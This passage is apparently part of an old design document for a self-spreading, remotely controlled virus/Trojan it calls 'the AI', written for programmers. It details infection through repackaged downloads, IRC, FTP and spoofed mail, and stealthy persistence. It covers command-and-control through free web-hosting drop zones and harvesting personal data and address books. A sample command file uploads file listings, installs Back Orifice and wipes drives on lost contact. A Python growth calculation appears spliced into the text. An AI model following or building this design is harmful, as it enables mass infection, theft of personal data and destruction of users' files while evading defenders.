Part III: Inner workings
========================
This section explains the considerations that should be taken into
account, technical specifications, and so on. It is aimed mainly at
programmers who understand the underlying technology.
Initial infection
-----------------
- Repackage bots
Robots that will download executables from frequently visited sites
(Tucows etc.), and repackage them to contain the package. These bots
could be instructed to visit certain sites more frequently than others
and to target certain files. These bots should have the ability to
decompress distributions, repackage them, and compress them again.
- DCCsend bot
Robots on multiple IRC channels that will at random DCC the package to
clients that are detected running the de facto standard Windows client
(mIRC). Robots could be written with intelligence to con users into
accepting the DCC. Bots could be situated in "Warez" channels, spreading
the repackaged commercial software.
- FTP put bot
Robots that will search the Internet for FTP servers with writable
/pub and /incoming directories, and drop the package in those
directories.
- Mail bot
These bots will be not unlike mass mailer programs, mailing the
package to many individuals, posing as representatives from various
organizations such as Hotmail, Geocities etc., with the package as a
free "gift". This "gift" can be something like a new screensaver or
HTML writer.
Note that all of these transport mechanisms imply that the receiver is
connected to the Internet in some way or another.
The AI itself can be coded in different forms, so that there will be
hundreds of different code signatures - this will make it difficult
for anti virus vendors to develop a program that will search for code
signatures.
First contact
-------------
Once the user has downloaded the package, he/she will execute it. The
package will run the normal program, and the AI will also execute. The
AI will install itself within the system, in such a way that it will
always execute at startup. It will also disguise itself, by renaming
itself to a non-suspect filename. This name will contain random
letters, and should not be longer than 6 letters. At every restart, it
will rename itself again (and modify the startup correctly). It could
also modify the startup method, e.g. by modifying the registry or
win.ini.
The AI must be able to detect itself. This will ensure that the AI
will not be installed every time the package is executed. This can be
done by "marking" the host - it will not reveal where the AI is
located, just that it has been infected. This "marking" will
furthermore hamper the detection process later on, as this mark has to
be removed before the host can be re-infected for lab purposes.
The AI will proceed to determine if it is situated in an online
environment (it can open a session to a machine on the Internet). If
direct connection is not possible, it will determine if a proxy is
present (registry), and use the proxy to connect to the Internet.
Ideally, the AI will monitor network traffic with destination port 80,
and determine the best path out - be that direct, or via a proxy. As
this could involve installing a custom packet driver, the AI could
monitor CPU load across different applications, and register an
online situation when a browser (IE or Netscape) uses CPU load.
The AI will only try to make a connection if it can safely determine
that there is an already open connection to the 'net.
The AI will contain a list of web servers that will be ready to accept
the registration. For every AI, this list will contain random
preferences. The AI will try to contact the web server with higher
preference and send a report to the web server. The AI will send the
report in the same way that browsers upload files to web servers. This
list could typically contain up to 75 different locations.
The initial report that the AI will send to the web server should
contain:
- Self generated serial number
- DNS name / IP
- Firewalled Y/N
- Proxies
- DHCP Y/N
- Interface information (type, speed etc)
- Platform (e.g. CPU, memory)
- Browser support (Netscape / IE)
- Mail support (Outlook, Eudora etc)
- Registered programs
- Real name
- Username
- Email address
Most of this information can be extracted from the registry. The AI
will save this report in a file with the same name as the self
generated serial number.
The AI will try to download a file called "counter". This file will
contain a number. It will increment this number, and upload the file,
with the same filename. This file is thus a counter of the number of
infected hosts that could reach the server(s). A "counter.lock" file
can be used to ensure that two hosts do not access the file at the
same time. A host that encounters a lock file will wait for a
predefined period of time, and retry.
It is *very* important that the virus is not discovered during the
initial infection stage. Care should be taken that the AI under no
circumstances reveals itself. It should rather end its life than
reveal itself.
Using different spreading mechanisms and different "host programs"
should ensure that the AI could still reproduce. The packages will
still contain the AI, and infection can spread along with it.
The web servers
---------------
These are the web servers where the AIs will register, and receive
commands from. The web servers should all be publicly accessible web
servers, where free webspace can be obtained - e.g. Geocities, Iname,
Yahoo, to name a few. Multiple accounts should be registered on every
server.
Commands "dropped" for the AIs should be replicated between the
servers. This means that all commands should be present on all
servers, so that a certain AI can pick up commands from different
servers (in the case that one server might be down, blocked, or
administratively taken down).
Replicating the data can be easily automated if the web server accepts
FTP connections. If the server does not, a Perl script can be built to
interrogate web interfaces. As it is envisaged that this virus will be
controlled by a group of people, a CRC checksum of all command files
could be stored on the web server. Replication will only happen when
CRC checksums between web servers do not match.
To hamper detection, fake web servers can be included in the list. The
AI will know that these sites do not contain a "drop zone", and will
not attempt to retrieve commands from or drop reports to them. The only
purpose of these fake sites will be to cause confusion to anti virus
vendors once the AI is detected.
More information on the format and distribution of "dropped" commands
will follow.
Day to day activity of the AI
-----------------------------
When the AI detects that it can open a pipe to its web server of
choice (as explained in the "First Contact" section), it will try to
download a file called ".cmd.". Failing this, it
will try to download a file named "general.cmd.". The first
file is a file containing specific commands for the AI. The AI will
internally keep count of command files that were received and executed
and will only act on command files with counters larger than its saved
counter. The second file is a file that is used for sending commands
to be executed by all AIs. It is envisaged that this will be the
default action, unless the controller has something specific in mind
for a particular host.
Both these files contain commands for the AI(s). After downloading the
command file, the AI will execute the commands. If the AI acts on
general commands it will increment a counter within a file called
"". By doing this, the controller can see
how many AIs have already executed the general command. Access to the
command counter file can also be regulated by a lock file.
An instruction set could contain the following commands:
- remove()
Remove the AI from memory, hard drives and IP stack.
- mass_destruct()
Erase all data, and reboot.
- sync (time)
Commands the AI to periodically fetch a new command file every "time"
minutes. The AI will still only contact the server when it can do so
safely.
- batch begin, batch end
All commands between batch begin and batch end will be executed as a
batch job. Commands between "begin" and "end" should be chosen to
redirect their output to files - see the example.
- download (filename, local name)
Downloads "filename" from the web server, and saves it as "local name"
on the host's hard drive.
- upload (local file, remote file)
Uploads "local file" to the web server, saving it as "remote file" on
the server.
- update (local file)
The AI will download "local file" and update itself. This could be
useful when anti virus vendors start to realize the threat.
- spread (count, rate)
See section on secondary infection.
- default begin (count), default end
Commands between default begin and default end will be executed if the
AI cannot connect to "count" servers in succession (it will still
only try to reach these servers when it detects that it is in an
online environment).
The command set can obviously be expanded to include typical BO
commands. An example of an AI command file could be:
default begin 4
 c;mass_destruct
default end
sync 15
batch begin
dir c:\*.doc /s > c:\dirall.docs
upload c:\dirall.docs 16643dhas13.all_docs
del c:\dirall.docs
download bo.exe c:\winnt\system32\taskbar.exe
c:\winnt\system32\taskbar.exe
batch end
spread 25000,5
END
In this example the AI will erase all data on all drives when contact
is lost with its top 4 servers. It will try to download command files
every 15 minutes. It will upload a file called 16643dhas13.all_docs
containing a listing of all .DOC files on the C: drive. It will
download and install Back Orifice. The "spread" command will be
discussed in the next section.
Note the "END" at the end of the command file. If the AI cannot find
"END" at the end of the command file, it must regard the command file
as incomplete, and not execute any commands.
With minimal effort, command files and reports can be encrypted.
Encrypting the data should make it much more difficult to determine
the mechanics of this virus. It will also help to ensure that anti
virus vendors cannot send commands to the web servers to automatically
erase the AI - such as "remove()".
Combining encryption with the "default begin default end" command
makes for a powerful concept. If the host is left on the 'net, it can
be remotely controlled. If the sites that the AI is visiting are taken
down, the host goes down with the AI. Anti virus vendors and security
experts cannot talk to the AI, because communication is encrypted. The
only way to be totally safe is to disconnect the host permanently from
the Internet.
Secondary infection
-------------------
Every AI that registers will increment the "counter" file. The
"spread" command acts on the number contained in the "counter" file. If
the counter exceeds "count", secondary infection procedures are
executed at rate "rate":
The AI will "farm" email addresses from known mail clients - e.g.
Outlook, Eudora and Netscape mail. It will extract mailer information
(SMTP gateway, local email address owner etc.) from the registry, or
directly from the mail client. The AI will disregard email addresses
that are within the same domain as the host (that is - it will never
send email to bob@bobby.com, if the local domain is bobby.com). This
is to minimize the chance that the virus will be discovered by
inter-human contact.
The AI will start sending out packages (see Part II) to number
of persons per day. Each message sent out will contain different
subject lines - e.g. "check this out", "have a look", "for your
information" etc. If the host contains less than email
addresses, it will send it to the maximum number of recipients, given
that they are not within the same domain. Note that via the command
file, the rate of infection can be controlled.
Let's assume that we have an initial install base of 10000 (which is
pretty conservative). If we send a spread index of 7 the virus/Trojan
will spread like this (assuming that the receiver is not yet
infected):
1st iteration: 70,000
2nd iteration: 490,000
3rd iteration: 3,430,000
4th iteration: 24,010,000
If we assume that only 75% of receivers will have an OS that is
susceptible to this virus/Trojan, and that only 50% of those will
execute the attachment we are still looking at:
1st iteration: 26,250
2nd iteration: 68,906
3rd iteration: 180,878
4th iteration: 474,807
at which time it will become difficult for the web servers to keep up.
Keep in mind that the 4th iteration can be reached within hours, where
after a mass_destruct() signal could possibly be issued.
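
The two tables above are plain geometric growth, and the arithmetic can
be checked with a short sketch. The function name and parameters below
are illustrative only and do not come from the original text. It
assumes, as the text does, that every receiver is new, and that the
75% and 50% factors simply multiply. With these inputs the fourth
reduced figure works out to 474,807.

```python
def growth_per_iteration(install_base, spread_index, success_rate=1.0, iterations=4):
    """Return the size of each successive iteration under geometric growth.

    install_base  -- starting count (10000 in the text)
    spread_index  -- recipients reached per host per iteration (7 in the text)
    success_rate  -- fraction of recipients that count (1.0, or 0.75 * 0.50)
    """
    sizes = []
    current = float(install_base)
    for _ in range(iterations):
        # Each iteration multiplies the previous one by the same factor.
        current = current * spread_index * success_rate
        sizes.append(int(current))  # truncate to whole hosts, as the text does
    return sizes


if __name__ == "__main__":
    # First table: every recipient counts.
    print(growth_per_iteration(10_000, 7))
    # Second table: 75% susceptible, 50% of those execute the attachment.
    print(growth_per_iteration(10_000, 7, success_rate=0.75 * 0.50))
```

The per-iteration factor in the second case is 7 x 0.375 = 2.625, so
growth stays exponential but is much slower than the unadjusted factor
of 7.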
Continue to Part IV: QWRNA
(questions we rather not ask)